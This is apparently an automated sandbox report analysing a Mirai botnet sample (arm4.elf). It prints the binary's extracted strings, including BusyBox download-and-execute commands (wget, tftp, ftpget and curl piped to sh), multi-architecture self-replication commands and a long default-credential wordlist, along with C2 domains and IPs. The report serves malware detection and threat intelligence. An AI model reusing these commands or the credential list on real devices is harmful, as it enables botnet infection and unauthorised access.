Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm4.elf

Overview

General Information

Sample name:arm4.elf
Analysis ID:1611398
MD5:2e611d06aeb1cc3dac822323b6d17a6c
SHA1:93a697b34c5c9d6d60f7bc05b9b0553a618e2ad1
SHA256:879f8c06476799fb014da7f4197f72f977dc2e2025d6fd01126c1d1e349f371e
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:76
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1611398
Start date and time:2025-02-10 20:57:23 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 36s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm4.elf
Detection:MAL
Classification:mal76.spre.troj.linELF@0/0@4/0
  • VT rate limit hit for: cuttiecats.ru. [malformed]
Command:/tmp/arm4.elf
PID:6233
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • arm4.elf (PID: 6233, Parent: 6157, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm4.elf
    • arm4.elf New Fork (PID: 6235, Parent: 6233)
      • arm4.elf New Fork (PID: 6237, Parent: 6235)
      • arm4.elf New Fork (PID: 6241, Parent: 6235)
      • arm4.elf New Fork (PID: 6242, Parent: 6235)
  • gdm3 New Fork (PID: 6267, Parent: 1320)
  • Default (PID: 6267, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6272, Parent: 1320)
  • Default (PID: 6272, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • xfdesktop (PID: 6275, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfce4-panel (PID: 6277, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
  • xfwm4 (PID: 6282, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
  • xfdesktop (PID: 6284, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfce4-panel (PID: 6286, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
arm4.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    arm4.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6233.1.00007ff580017000.00007ff58002f000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        6233.1.00007ff580017000.00007ff58002f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6241.1.00007ff580017000.00007ff58002f000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            6241.1.00007ff580017000.00007ff58002f000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6237.1.00007ff580017000.00007ff58002f000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: arm4.elfAvira: detected
                Source: arm4.elfString: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0

                Networking

                barindex
                Source: global trafficTCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8
                Source: global trafficDNS traffic detected: malformed DNS query: cuttiecats.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: polizei.su. [malformed]
                Source: global trafficTCP traffic: 192.168.2.23:39708 -> 185.93.89.106:38241
                Source: /tmp/arm4.elf (PID: 6233)Socket: 127.0.0.1:39148Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 16.77.138.247
                Source: unknownTCP traffic detected without corresponding DNS query: 16.77.138.247
                Source: unknownTCP traffic detected without corresponding DNS query: 88.12.42.142
                Source: unknownTCP traffic detected without corresponding DNS query: 13.84.114.117
                Source: unknownTCP traffic detected without corresponding DNS query: 88.12.42.142
                Source: unknownTCP traffic detected without corresponding DNS query: 150.171.47.88
                Source: unknownTCP traffic detected without corresponding DNS query: 13.84.114.117
                Source: unknownTCP traffic detected without corresponding DNS query: 175.114.233.75
                Source: unknownTCP traffic detected without corresponding DNS query: 150.171.47.88
                Source: unknownTCP traffic detected without corresponding DNS query: 73.139.184.123
                Source: unknownTCP traffic detected without corresponding DNS query: 175.114.233.75
                Source: unknownTCP traffic detected without corresponding DNS query: 73.139.184.123
                Source: unknownTCP traffic detected without corresponding DNS query: 182.109.211.92
                Source: unknownTCP traffic detected without corresponding DNS query: 163.69.161.84
                Source: unknownTCP traffic detected without corresponding DNS query: 182.109.211.92
                Source: unknownTCP traffic detected without corresponding DNS query: 201.73.138.150
                Source: unknownTCP traffic detected without corresponding DNS query: 163.69.161.84
                Source: unknownTCP traffic detected without corresponding DNS query: 201.73.138.150
                Source: unknownTCP traffic detected without corresponding DNS query: 41.87.27.147
                Source: unknownTCP traffic detected without corresponding DNS query: 82.241.224.181
                Source: unknownTCP traffic detected without corresponding DNS query: 41.87.27.147
                Source: unknownTCP traffic detected without corresponding DNS query: 34.165.31.3
                Source: unknownTCP traffic detected without corresponding DNS query: 92.103.255.193
                Source: unknownTCP traffic detected without corresponding DNS query: 82.241.224.181
                Source: unknownTCP traffic detected without corresponding DNS query: 34.165.31.3
                Source: unknownTCP traffic detected without corresponding DNS query: 28.43.37.155
                Source: unknownTCP traffic detected without corresponding DNS query: 92.103.255.193
                Source: unknownTCP traffic detected without corresponding DNS query: 45.215.74.98
                Source: unknownTCP traffic detected without corresponding DNS query: 28.43.37.155
                Source: unknownTCP traffic detected without corresponding DNS query: 80.77.205.68
                Source: unknownTCP traffic detected without corresponding DNS query: 45.215.74.98
                Source: unknownTCP traffic detected without corresponding DNS query: 21.246.80.80
                Source: unknownTCP traffic detected without corresponding DNS query: 80.77.205.68
                Source: unknownTCP traffic detected without corresponding DNS query: 79.163.40.134
                Source: unknownTCP traffic detected without corresponding DNS query: 21.246.80.80
                Source: unknownTCP traffic detected without corresponding DNS query: 102.30.246.215
                Source: unknownTCP traffic detected without corresponding DNS query: 118.163.76.89
                Source: unknownTCP traffic detected without corresponding DNS query: 79.163.40.134
                Source: unknownTCP traffic detected without corresponding DNS query: 102.30.246.215
                Source: unknownTCP traffic detected without corresponding DNS query: 57.120.199.241
                Source: unknownTCP traffic detected without corresponding DNS query: 118.163.76.89
                Source: unknownTCP traffic detected without corresponding DNS query: 57.120.199.241
                Source: unknownTCP traffic detected without corresponding DNS query: 37.167.173.36
                Source: unknownTCP traffic detected without corresponding DNS query: 37.167.173.36
                Source: unknownTCP traffic detected without corresponding DNS query: 37.22.199.62
                Source: unknownTCP traffic detected without corresponding DNS query: 91.57.48.123
                Source: unknownTCP traffic detected without corresponding DNS query: 37.22.199.62
                Source: unknownTCP traffic detected without corresponding DNS query: 23.185.156.128
                Source: unknownTCP traffic detected without corresponding DNS query: 91.57.48.123
                Source: unknownTCP traffic detected without corresponding DNS query: 134.64.22.190
                Source: global trafficDNS traffic detected: DNS query: cat-are-here.ru
                Source: global trafficDNS traffic detected: DNS query: cuttiecats.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: polizei.su. [malformed]
                Source: arm4.elfString found in binary or memory: http:///curl.sh
                Source: arm4.elfString found in binary or memory: http:///wget.sh
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                System Summary

                barindex
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6218, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6237, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6241, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6268, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6273, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6274, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6275, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6276, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6277, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6278, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6279, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6280, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6281, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6282, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6283, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6284, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6285, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6286, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6287, result: successfulJump to behavior
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
                Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
                Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .d
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: 654321
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6218, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6237, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6241, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6268, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6273, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6274, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6275, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6276, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6277, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6278, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6279, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6280, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6281, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6282, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6283, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6284, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6285, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6286, result: successfulJump to behavior
                Source: /tmp/arm4.elf (PID: 6242)SIGKILL sent: pid: 6287, result: successfulJump to behavior
                Source: classification engineClassification label: mal76.spre.troj.linELF@0/0@4/0
                Source: /tmp/arm4.elf (PID: 6233)Queries kernel information via 'uname': Jump to behavior
                Source: arm4.elf, 6233.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6237.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6241.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm4.elf
                Source: arm4.elfBinary or memory string: vmware
                Source: arm4.elf, 6233.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6237.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6241.1.0000560060b33000.0000560060c61000.rw-.sdmpBinary or memory string: `V!/etc/qemu-binfmt/arm
                Source: arm4.elfBinary or memory string: vmware123
                Source: arm4.elfBinary or memory string: / nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter
                Source: arm4.elf, 6233.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6237.1.0000560060b33000.0000560060c61000.rw-.sdmp, arm4.elf, 6241.1.0000560060b33000.0000560060c61000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: arm4.elf, 6233.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6237.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmp, arm4.elf, 6241.1.00007ffc675a7000.00007ffc675c8000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: arm4.elf, type: SAMPLE
                Source: Yara matchFile source: 6233.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6241.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6237.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: arm4.elf, type: SAMPLE
                Source: Yara matchFile source: 6233.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6241.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6237.1.00007ff580017000.00007ff58002f000.r-x.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path InterceptionDirect Volume Access1
                Brute Force
                11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network Medium1
                Service Stop
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                Application Layer Protocol
                Traffic DuplicationData Destruction
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611398 Sample: arm4.elf Startdate: 10/02/2025 Architecture: LINUX Score: 76 25 cuttiecats.ru. [malformed] 2->25 27 polizei.su. [malformed] 2->27 29 56 other IPs or domains 2->29 33 Antivirus / Scanner detection for submitted sample 2->33 35 Yara detected Mirai 2->35 37 Connects to many ports of the same IP (likely port scanning) 2->37 8 arm4.elf 2->8         started        10 xfce4-session xfdesktop 2->10         started        12 xfce4-session xfce4-panel 2->12         started        14 11 other processes 2->14 signatures3 39 Sends malformed DNS queries 27->39 process4 process5 16 arm4.elf 8->16         started        process6 18 arm4.elf 16->18         started        21 arm4.elf 16->21         started        23 arm4.elf 16->23         started        signatures7 31 Sample tries to kill multiple processes (SIGKILL) 18->31
                SourceDetectionScannerLabelLink
                arm4.elf100%AviraEXP/ELF.Mirai.W
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                cat-are-here.ru
                185.93.89.106
                truefalse
                  high
                  cuttiecats.ru. [malformed]
                  unknown
                  unknowntrue
                    unknown
                    polizei.su. [malformed]
                    unknown
                    unknownfalse
                      high
                      kittlez.ru. [malformed]
                      unknown
                      unknownfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http:///wget.sharm4.elffalse
                          high
                          http:///curl.sharm4.elffalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            16.72.19.8
                            unknownUnited States
                            unknownunknownfalse
                            21.246.80.80
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            13.84.114.117
                            unknownUnited States
